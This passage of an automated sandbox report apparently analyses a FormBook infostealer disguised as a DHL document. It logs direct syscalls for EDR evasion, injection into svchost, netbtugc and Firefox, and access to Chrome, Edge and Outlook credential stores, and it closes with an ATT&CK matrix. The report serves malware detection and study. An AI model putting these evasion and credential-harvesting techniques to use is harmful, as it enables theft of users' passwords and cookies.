Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F649D0 mov eax, dword ptr fs:[00000030h]	2_2_02F649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFA9D3 mov eax, dword ptr fs:[00000030h]	2_2_02FFA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC69C0 mov eax, dword ptr fs:[00000030h]	2_2_02FC69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB89B3 mov esi, dword ptr fs:[00000030h]	2_2_02FB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB89B3 mov eax, dword ptr fs:[00000030h]	2_2_02FB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB89B3 mov eax, dword ptr fs:[00000030h]	2_2_02FB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F309AD mov eax, dword ptr fs:[00000030h]	2_2_02F309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F309AD mov eax, dword ptr fs:[00000030h]	2_2_02F309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD4978 mov eax, dword ptr fs:[00000030h]	2_2_02FD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD4978 mov eax, dword ptr fs:[00000030h]	2_2_02FD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBC97C mov eax, dword ptr fs:[00000030h]	2_2_02FBC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h]	2_2_02F56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h]	2_2_02F56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h]	2_2_02F56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F7096E mov eax, dword ptr fs:[00000030h]	2_2_02F7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F7096E mov edx, dword ptr fs:[00000030h]	2_2_02F7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F7096E mov eax, dword ptr fs:[00000030h]	2_2_02F7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB0946 mov eax, dword ptr fs:[00000030h]	2_2_02FB0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB892A mov eax, dword ptr fs:[00000030h]	2_2_02FB892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC892B mov eax, dword ptr fs:[00000030h]	2_2_02FC892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBC912 mov eax, dword ptr fs:[00000030h]	2_2_02FBC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F28918 mov eax, dword ptr fs:[00000030h]	2_2_02F28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F28918 mov eax, dword ptr fs:[00000030h]	2_2_02F28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAE908 mov eax, dword ptr fs:[00000030h]	2_2_02FAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAE908 mov eax, dword ptr fs:[00000030h]	2_2_02FAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F68EF5 mov eax, dword ptr fs:[00000030h]	2_2_02F68EF5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36EE0 mov eax, dword ptr fs:[00000030h]	2_2_02F36EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36EE0 mov eax, dword ptr fs:[00000030h]	2_2_02F36EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36EE0 mov eax, dword ptr fs:[00000030h]	2_2_02F36EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36EE0 mov eax, dword ptr fs:[00000030h]	2_2_02F36EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FCAEB0 mov eax, dword ptr fs:[00000030h]	2_2_02FCAEB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FCAEB0 mov eax, dword ptr fs:[00000030h]	2_2_02FCAEB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBCEA0 mov eax, dword ptr fs:[00000030h]	2_2_02FBCEA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBCEA0 mov eax, dword ptr fs:[00000030h]	2_2_02FBCEA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBCEA0 mov eax, dword ptr fs:[00000030h]	2_2_02FBCEA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2AE90 mov eax, dword ptr fs:[00000030h]	2_2_02F2AE90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2AE90 mov eax, dword ptr fs:[00000030h]	2_2_02F2AE90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2AE90 mov eax, dword ptr fs:[00000030h]	2_2_02F2AE90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03004F68 mov eax, dword ptr fs:[00000030h]	2_2_03004F68
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F62E9C mov eax, dword ptr fs:[00000030h]	2_2_02F62E9C

Source: C:\Users\user\Desktop\DHL 806-232024.exe

Code function: 0_2_009281F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_009281F7

Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_008FA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_008FA395
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_008FA364 SetUnhandledExceptionFilter,		0_2_008FA364

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	NtAllocateVirtualMemory: Direct from: 0x76EF48EC	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	NtQueryAttributesFile: Direct from: 0x76EF2E6C	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	NtQuerySystemInformation: Direct from: 0x76EF48CC	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	NtOpenSection: Direct from: 0x76EF2E0C	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	NtDeviceIoControlFile: Direct from: 0x76EF2AEC	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	NtQueryValueKey: Direct from: 0x76EF2BEC	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	NtQueryInformationToken: Direct from: 0x76EF2CAC	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	NtCreateFile: Direct from: 0x76EF2FEC	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	NtOpenFile: Direct from: 0x76EF2DCC	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	NtTerminateThread: Direct from: 0x76EF2FCC	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	NtOpenKeyEx: Direct from: 0x76EF2B9C	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	NtSetInformationProcess: Direct from: 0x76EF2C5C	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	NtProtectVirtualMemory: Direct from: 0x76EF2F9C	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	NtWriteVirtualMemory: Direct from: 0x76EF2E3C	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	NtNotifyChangeKey: Direct from: 0x76EF3C2C	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	NtCreateMutant: Direct from: 0x76EF35CC	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	NtResumeThread: Direct from: 0x76EF36AC	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	NtMapViewOfSection: Direct from: 0x76EF2D1C	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	NtProtectVirtualMemory: Direct from: 0x76EE7B2E	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BFC	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	NtQuerySystemInformation: Direct from: 0x76EF2DFC	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	NtReadFile: Direct from: 0x76EF2ADC	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	NtDelayExecution: Direct from: 0x76EF2DDC	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	NtQueryInformationProcess: Direct from: 0x76EF2C26	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	NtResumeThread: Direct from: 0x76EF2FBC	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	NtCreateUserProcess: Direct from: 0x76EF371C	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	NtOpenKeyEx: Direct from: 0x76EF3C9C	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	NtWriteVirtualMemory: Direct from: 0x76EF490C	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	NtSetInformationThread: Direct from: 0x76EE63F9	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	NtSetInformationThread: Direct from: 0x76EF2B4C	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	NtReadVirtualMemory: Direct from: 0x76EF2E8C	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	NtCreateKey: Direct from: 0x76EF2C6C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\DHL 806-232024.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\netbtugc.exe

Thread register set: target process: 7080

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\netbtugc.exe

Thread APC queued: target process: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\DHL 806-232024.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2579008

Jump to behavior

Source: C:\Users\user\Desktop\DHL 806-232024.exe

Code function: 0_2_00928C93 LogonUserW,

0_2_00928C93

Source: C:\Users\user\Desktop\DHL 806-232024.exe

Code function: 0_2_008D3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_008D3B4C

Source: C:\Users\user\Desktop\DHL 806-232024.exe

Code function: 0_2_008D4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_008D4A35

Source: C:\Users\user\Desktop\DHL 806-232024.exe

Code function: 0_2_00934EC9 mouse_event,

0_2_00934EC9

Source: C:\Users\user\Desktop\DHL 806-232024.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL 806-232024.exe"	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\DHL 806-232024.exe

0_2_009281F7

Source: C:\Users\user\Desktop\DHL 806-232024.exe

Code function: 0_2_00934C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00934C03

Source: DHL 806-232024.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: yAEEhNGBaPExAdMu.exe, 00000003.00000002.4530213466.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000003.00000000.2132130043.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000000.2283496849.0000000000F21000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: DHL 806-232024.exe, yAEEhNGBaPExAdMu.exe, 00000003.00000002.4530213466.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000003.00000000.2132130043.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000000.2283496849.0000000000F21000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: yAEEhNGBaPExAdMu.exe, 00000003.00000002.4530213466.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000003.00000000.2132130043.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000000.2283496849.0000000000F21000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: yAEEhNGBaPExAdMu.exe, 00000003.00000002.4530213466.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000003.00000000.2132130043.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000000.2283496849.0000000000F21000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\DHL 806-232024.exe

Code function: 0_2_008F886B cpuid

0_2_008F886B

Source: C:\Users\user\Desktop\DHL 806-232024.exe

Code function: 0_2_009050D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_009050D7

Source: C:\Users\user\Desktop\DHL 806-232024.exe

Code function: 0_2_00912230 GetUserNameW,

0_2_00912230

Source: C:\Users\user\Desktop\DHL 806-232024.exe

Code function: 0_2_0090418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_0090418A

Source: C:\Users\user\Desktop\DHL 806-232024.exe

Code function: 0_2_008D4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_008D4AFE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.320000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2214041996.0000000000320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4529624062.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4530493179.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4530474719.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2215036751.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2214383859.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4530432523.0000000003460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\netbtugc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: DHL 806-232024.exe	Binary or memory string: WIN_81
Source: DHL 806-232024.exe	Binary or memory string: WIN_XP
Source: DHL 806-232024.exe	Binary or memory string: WIN_XPe
Source: DHL 806-232024.exe	Binary or memory string: WIN_VISTA
Source: DHL 806-232024.exe	Binary or memory string: WIN_7
Source: DHL 806-232024.exe	Binary or memory string: WIN_8
Source: DHL 806-232024.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.320000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2214041996.0000000000320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4529624062.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4530493179.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4530474719.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2215036751.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2214383859.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4530432523.0000000003460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_00946596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00946596
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_00946A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00946A5A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
